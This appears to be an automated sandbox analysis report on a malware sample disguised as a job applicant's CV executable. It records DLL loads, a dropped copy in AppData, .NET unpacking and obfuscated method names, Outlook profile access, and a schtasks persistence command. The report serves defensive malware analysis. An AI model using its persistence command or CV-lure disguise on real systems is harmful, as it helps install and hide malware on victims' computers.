Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{41B89B6B-9399-11D2-9623-00C04F8EE628}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Kayla Dennis CV.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Kayla Dennis CV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000B.00000002.3283027662.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000B.00000002.3283027662.0000000000C92000.00000002.00000001.01000000.0000000D.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, w1Wamsg80XvcbX1PDi.cs	.Net Code: Mn7q87oQn4 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, w1Wamsg80XvcbX1PDi.cs	.Net Code: Mn7q87oQn4 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Code function: 0_2_07D7FB7F push eax; retf	0_2_07D7FB8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012F4000 push eax; ret	11_2_012F400A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012F40C5 push eax; ret	11_2_012F3FFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012F3F90 push eax; ret	11_2_012F3F7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012F3F90 push eax; ret	11_2_012F401A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012F3F90 push eax; ret	11_2_012F402A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_012F3FE0 push eax; ret	11_2_012F3FFA
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Code function: 12_2_0799EE0B push eax; retf	12_2_0799EE0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01014000 push eax; ret	17_2_0101400A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01014010 push eax; ret	17_2_0101401A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_010140C5 push eax; ret	17_2_01013FFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_010124B9 push 8BFFFFFFh; retf	17_2_010124BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01013F90 push eax; ret	17_2_01013F7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01013FE0 push eax; ret	17_2_01013FFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_056344E8 push eax; iretd	17_2_056344E9

Source: Kayla Dennis CV.exe	Static PE information: section name: .text entropy: 7.899161344113745
Source: lyKbfEsVYfQfU.exe.0.dr	Static PE information: section name: .text entropy: 7.899161344113745

Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, Ae3EapnZ1ndJoCaosg.cs	High entropy of concatenated method names: 'fBwyW76B29', 'zr7yME9E5V', 'rEUyUpqDjI', 'AMmUdvjMND', 'PfSUz7aPTA', 'oJYyBtP5HZ', 'GeqyHdB3k3', 'o89yS9ieiV', 'g8GylhCpNr', 'Uyqyq8Bs3K'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, zZBwcFdoCBhDHvdrMM.cs	High entropy of concatenated method names: 'TJJvMsFir8', 'wM6v5STYFS', 'Ax8vU2BvHU', 'y4CvyCx9cs', 'vbfv2LJTx8', 'gGXvgcBxFQ', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, zeMT1koqZxrLyrXShU.cs	High entropy of concatenated method names: 'kSl2bZ7c8j', 'zVC2fOd46r', 'Od22JtDZlm', 'U5U2XR3lLN', 'lkL21AOism', 'Yd32CYZ7hM', 'U5M2ndtZ3F', 'O2e2wfMXLS', 'b6F2jQIsnI', 'aoe2TDkCtn'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, qFWcJZVwvHTZWf33J1.cs	High entropy of concatenated method names: 'Ojr7TpZypU', 'E7I709nnLq', 'wkN7Vu68hv', 'v3P7Zfv0va', 'LQa7fuBIeE', 'eDK7JVO9RZ', 'iTL7XDouVq', 'Oh5717ufkx', 'x1D7CdQHe7', 'Alv7nPaJKn'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, Et4w0UHHdcftwrrdAtp.cs	High entropy of concatenated method names: 'UeAvdSb4ZQ', 'IX2vzGsBHi', 'gVH6BECLu2', 'm6X6HUWPbY', 'lDT6Sp6Uvg', 'geE6lHmt9R', 'CvH6q81Fe7', 'qqb6cBIBpF', 'BK36WFbO4U', 'cIa6AcK8GZ'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, K9CQNMrr6cZBHfROeJ.cs	High entropy of concatenated method names: 'ToString', 'guoO9VrYpi', 'rdkOfuukvn', 'GImOJODpH8', 'QilOXgKLCE', 'xViO1craXK', 'dmROC8ejpL', 'Ua6Onpog98', 'hMIOwMQhJ1', 'e7TOjwlfGl'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, oyVIcTqqP4C6AwsfEK.cs	High entropy of concatenated method names: 'rJUHy0Wcui', 'fSwHgH93uG', 'uS6HirC03X', 'XOQHGFxe67', 'UdqH7Yjy05', 'wP7HOHCDY9', 'e4Ou1PlVZn1FbSUMMI', 'KEpxqRSxBGMhhnKR7g', 'K6Z1L4jGHejX3XdxPj', 'cNCHHQUBGk'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, rNBnHnp1WKJm5AxIZM.cs	High entropy of concatenated method names: 'ltp27jKoUC', 'ikc2FKrRkY', 'IXm22SMVju', 'Nsp265KOsC', 'J1O2xKNZJQ', 'eMu2mD88QR', 'Dispose', 'H5LKWTj2jg', 'CViKAOxeoP', 'D8FKMG86Jh'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, Ch0lk6HBVj9gH1dXbDR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B8Iv93e3k5', 'hDcv05MZC4', 'YMtvu5wDCE', 'gFQvVFUkcA', 'MWQvZdEQuL', 'vx1vrnjrBM', 'JMSvhsrxMu'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, qq0i0xtS6rC03X4OQF.cs	High entropy of concatenated method names: 'DPPMY4eC7s', 'M8nMLaAP6K', 'Eq0MQN2xFb', 'h1QMtX7muk', 'CAAM7UofyA', 'a7fMOHTjPd', 'frSMFu4K4t', 'dZmMKCCqru', 'TPYM2AMMUY', 'FdNMv7wZOA'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, EoWQELuK6MS0aI4AZn.cs	High entropy of concatenated method names: 'LcN3QQ3861', 'IOZ3tYvelN', 'SBH3bGHt7a', 'BWl3fF0Mrp', 'ja23XXrhMM', 'Ggw318aOcR', 'EXj3nvJsQB', 'kW53wLJgMl', 'WxS3T1PNJZ', 'dLK39eAaax'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, j05EP7bHCDY9bVeb91.cs	High entropy of concatenated method names: 'HuXUcUK1Wt', 'yAtUA96WRN', 'p5RU5EUSpb', 'kNcUytuXHc', 'XNKUgCaH1Q', 'me45R9T2DP', 'OTc5ayrgrt', 'FZS5p6OhMm', 'FLl54NAG8P', 'NJ55oDCZBG'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, mcLAcvjWC5sDoJTaiB.cs	High entropy of concatenated method names: 'G7lye2NI3l', 'j1NyDSyr5P', 'PrGy8iMkNf', 'XXCyYSCkJL', 'bg1yk0uLmk', 'jgmyLwAXpd', 'WCNyNscGDR', 'XPAyQKFZpJ', 'X5lyt14bPC', 'QdwyIH1veW'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, ve67QJIErbjQ2RdqYj.cs	High entropy of concatenated method names: 'Aot5koFUs9', 'Bvn5NfFVNJ', 'nSeMJvcmYb', 'mDuMXbva5f', 'FvuM1cGliW', 'glOMCI2RB1', 'eAfMnppDA1', 'ItaMwPNlqS', 'H9LMjmoe8p', 'rIRMT1mgpR'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, w1Wamsg80XvcbX1PDi.cs	High entropy of concatenated method names: 'MinlcY01X1', 'buxlW2A0PM', 'pCAlAapHkX', 'zdYlMw9nw9', 'aR2l548Ys8', 'cg5lU0EjOp', 'Fk1lyh2hEa', 'r0GlgC8PMW', 'c15lP4C6iv', 'peIli6pPbW'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, FoAFRBaaCt9wLgIjEA.cs	High entropy of concatenated method names: 'bI2F43Kuhd', 'iPtFdBG81p', 'hMSKBntYOx', 'AnBKHuuUjU', 'UNPF9fXWmr', 'rSqF0RkJL1', 'Jc5FuMe4Gi', 'KetFV6gXMe', 'I9xFZNUtNT', 'jbkFrsD0Xj'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, qfee45ScyUVTNoxrqO.cs	High entropy of concatenated method names: 'r438KqbKP', 'GhaYb3nJP', 'uL1LZ1IhJ', 'xXCNJqLLF', 'xretaYAeJ', 'X4rIsXJkr', 'okUWK9PwRXxVfei56R', 'Usr43lfDOXW0PJ7320', 'pRpKo1xgj', 'UQZvfsAAk'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, XLJX4JHqAW5aPYZSNNV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q1is2oA8Gd', 'VrOsvcE3Om', 'mtHs66PReB', 'MZSssXyLna', 'U1FsxIDhrk', 'L1RsEnZbLP', 'ejwsmx2FSo'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, qKGIPyzat1P0lbO4vD.cs	High entropy of concatenated method names: 'rPUvLGJ45q', 'l5UvQUXi1R', 'gr1vtiQhxk', 'bUrvbtyXZB', 'MpKvfQGK9v', 'AcGvXnUjYL', 'X4dv1gpMMA', 'CIlvmiYf0u', 'qngvedj0qJ', 'R8FvDRF3bv'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, i0WcuiQWSwH93uGufO.cs	High entropy of concatenated method names: 'UDKAV7WacB', 'NGqAZYdiCx', 'IumArdoEWb', 'q3sAhNXYUC', 'Yf0ARC1XLT', 'N44Aash1g4', 'EsZAp2VnQ4', 'BHyA4ZCssE', 'fapAoCYMBF', 'D8CAd5Ngg6'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, uwQd63hVoUjkE35mIB.cs	High entropy of concatenated method names: 'ehoFiZGsZt', 'G54FGnFHS9', 'ToString', 'JnnFWK9XIj', 'WLeFA4QgJo', 'TfZFMaBdJq', 'qdDF5mCkLb', 'aVFFUqDdId', 'yK1Fyd2LBE', 'TETFgDy7u1'
Source: 0.2.Kayla Dennis CV.exe.84f0000.4.raw.unpack, xKwrqWApA4CjlIblEN.cs	High entropy of concatenated method names: 'Dispose', 'rJmHo5AxIZ', 'OTySfiHa95', 'zKGsRrLkOU', 'gf7HdXJ9qh', 'AiYHzwrMHp', 'ProcessDialogKey', 'Nd8SBeMT1k', 'eZxSHrLyrX', 'chUSSYZBwc'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, Ae3EapnZ1ndJoCaosg.cs	High entropy of concatenated method names: 'fBwyW76B29', 'zr7yME9E5V', 'rEUyUpqDjI', 'AMmUdvjMND', 'PfSUz7aPTA', 'oJYyBtP5HZ', 'GeqyHdB3k3', 'o89yS9ieiV', 'g8GylhCpNr', 'Uyqyq8Bs3K'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, zZBwcFdoCBhDHvdrMM.cs	High entropy of concatenated method names: 'TJJvMsFir8', 'wM6v5STYFS', 'Ax8vU2BvHU', 'y4CvyCx9cs', 'vbfv2LJTx8', 'gGXvgcBxFQ', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, zeMT1koqZxrLyrXShU.cs	High entropy of concatenated method names: 'kSl2bZ7c8j', 'zVC2fOd46r', 'Od22JtDZlm', 'U5U2XR3lLN', 'lkL21AOism', 'Yd32CYZ7hM', 'U5M2ndtZ3F', 'O2e2wfMXLS', 'b6F2jQIsnI', 'aoe2TDkCtn'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, qFWcJZVwvHTZWf33J1.cs	High entropy of concatenated method names: 'Ojr7TpZypU', 'E7I709nnLq', 'wkN7Vu68hv', 'v3P7Zfv0va', 'LQa7fuBIeE', 'eDK7JVO9RZ', 'iTL7XDouVq', 'Oh5717ufkx', 'x1D7CdQHe7', 'Alv7nPaJKn'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, Et4w0UHHdcftwrrdAtp.cs	High entropy of concatenated method names: 'UeAvdSb4ZQ', 'IX2vzGsBHi', 'gVH6BECLu2', 'm6X6HUWPbY', 'lDT6Sp6Uvg', 'geE6lHmt9R', 'CvH6q81Fe7', 'qqb6cBIBpF', 'BK36WFbO4U', 'cIa6AcK8GZ'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, K9CQNMrr6cZBHfROeJ.cs	High entropy of concatenated method names: 'ToString', 'guoO9VrYpi', 'rdkOfuukvn', 'GImOJODpH8', 'QilOXgKLCE', 'xViO1craXK', 'dmROC8ejpL', 'Ua6Onpog98', 'hMIOwMQhJ1', 'e7TOjwlfGl'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, oyVIcTqqP4C6AwsfEK.cs	High entropy of concatenated method names: 'rJUHy0Wcui', 'fSwHgH93uG', 'uS6HirC03X', 'XOQHGFxe67', 'UdqH7Yjy05', 'wP7HOHCDY9', 'e4Ou1PlVZn1FbSUMMI', 'KEpxqRSxBGMhhnKR7g', 'K6Z1L4jGHejX3XdxPj', 'cNCHHQUBGk'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, rNBnHnp1WKJm5AxIZM.cs	High entropy of concatenated method names: 'ltp27jKoUC', 'ikc2FKrRkY', 'IXm22SMVju', 'Nsp265KOsC', 'J1O2xKNZJQ', 'eMu2mD88QR', 'Dispose', 'H5LKWTj2jg', 'CViKAOxeoP', 'D8FKMG86Jh'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, Ch0lk6HBVj9gH1dXbDR.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B8Iv93e3k5', 'hDcv05MZC4', 'YMtvu5wDCE', 'gFQvVFUkcA', 'MWQvZdEQuL', 'vx1vrnjrBM', 'JMSvhsrxMu'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, qq0i0xtS6rC03X4OQF.cs	High entropy of concatenated method names: 'DPPMY4eC7s', 'M8nMLaAP6K', 'Eq0MQN2xFb', 'h1QMtX7muk', 'CAAM7UofyA', 'a7fMOHTjPd', 'frSMFu4K4t', 'dZmMKCCqru', 'TPYM2AMMUY', 'FdNMv7wZOA'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, EoWQELuK6MS0aI4AZn.cs	High entropy of concatenated method names: 'LcN3QQ3861', 'IOZ3tYvelN', 'SBH3bGHt7a', 'BWl3fF0Mrp', 'ja23XXrhMM', 'Ggw318aOcR', 'EXj3nvJsQB', 'kW53wLJgMl', 'WxS3T1PNJZ', 'dLK39eAaax'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, j05EP7bHCDY9bVeb91.cs	High entropy of concatenated method names: 'HuXUcUK1Wt', 'yAtUA96WRN', 'p5RU5EUSpb', 'kNcUytuXHc', 'XNKUgCaH1Q', 'me45R9T2DP', 'OTc5ayrgrt', 'FZS5p6OhMm', 'FLl54NAG8P', 'NJ55oDCZBG'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, mcLAcvjWC5sDoJTaiB.cs	High entropy of concatenated method names: 'G7lye2NI3l', 'j1NyDSyr5P', 'PrGy8iMkNf', 'XXCyYSCkJL', 'bg1yk0uLmk', 'jgmyLwAXpd', 'WCNyNscGDR', 'XPAyQKFZpJ', 'X5lyt14bPC', 'QdwyIH1veW'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, ve67QJIErbjQ2RdqYj.cs	High entropy of concatenated method names: 'Aot5koFUs9', 'Bvn5NfFVNJ', 'nSeMJvcmYb', 'mDuMXbva5f', 'FvuM1cGliW', 'glOMCI2RB1', 'eAfMnppDA1', 'ItaMwPNlqS', 'H9LMjmoe8p', 'rIRMT1mgpR'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, w1Wamsg80XvcbX1PDi.cs	High entropy of concatenated method names: 'MinlcY01X1', 'buxlW2A0PM', 'pCAlAapHkX', 'zdYlMw9nw9', 'aR2l548Ys8', 'cg5lU0EjOp', 'Fk1lyh2hEa', 'r0GlgC8PMW', 'c15lP4C6iv', 'peIli6pPbW'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, FoAFRBaaCt9wLgIjEA.cs	High entropy of concatenated method names: 'bI2F43Kuhd', 'iPtFdBG81p', 'hMSKBntYOx', 'AnBKHuuUjU', 'UNPF9fXWmr', 'rSqF0RkJL1', 'Jc5FuMe4Gi', 'KetFV6gXMe', 'I9xFZNUtNT', 'jbkFrsD0Xj'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, qfee45ScyUVTNoxrqO.cs	High entropy of concatenated method names: 'r438KqbKP', 'GhaYb3nJP', 'uL1LZ1IhJ', 'xXCNJqLLF', 'xretaYAeJ', 'X4rIsXJkr', 'okUWK9PwRXxVfei56R', 'Usr43lfDOXW0PJ7320', 'pRpKo1xgj', 'UQZvfsAAk'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, XLJX4JHqAW5aPYZSNNV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Q1is2oA8Gd', 'VrOsvcE3Om', 'mtHs66PReB', 'MZSssXyLna', 'U1FsxIDhrk', 'L1RsEnZbLP', 'ejwsmx2FSo'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, qKGIPyzat1P0lbO4vD.cs	High entropy of concatenated method names: 'rPUvLGJ45q', 'l5UvQUXi1R', 'gr1vtiQhxk', 'bUrvbtyXZB', 'MpKvfQGK9v', 'AcGvXnUjYL', 'X4dv1gpMMA', 'CIlvmiYf0u', 'qngvedj0qJ', 'R8FvDRF3bv'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, i0WcuiQWSwH93uGufO.cs	High entropy of concatenated method names: 'UDKAV7WacB', 'NGqAZYdiCx', 'IumArdoEWb', 'q3sAhNXYUC', 'Yf0ARC1XLT', 'N44Aash1g4', 'EsZAp2VnQ4', 'BHyA4ZCssE', 'fapAoCYMBF', 'D8CAd5Ngg6'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, uwQd63hVoUjkE35mIB.cs	High entropy of concatenated method names: 'ehoFiZGsZt', 'G54FGnFHS9', 'ToString', 'JnnFWK9XIj', 'WLeFA4QgJo', 'TfZFMaBdJq', 'qdDF5mCkLb', 'aVFFUqDdId', 'yK1Fyd2LBE', 'TETFgDy7u1'
Source: 0.2.Kayla Dennis CV.exe.46362c0.2.raw.unpack, xKwrqWApA4CjlIblEN.cs	High entropy of concatenated method names: 'Dispose', 'rJmHo5AxIZ', 'OTySfiHa95', 'zKGsRrLkOU', 'gf7HdXJ9qh', 'AiYHzwrMHp', 'ProcessDialogKey', 'Nd8SBeMT1k', 'eZxSHrLyrX', 'chUSSYZBwc'

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

File created: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lyKbfEsVYfQfU" /XML "C:\Users\user\AppData\Local\Temp\tmp796.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
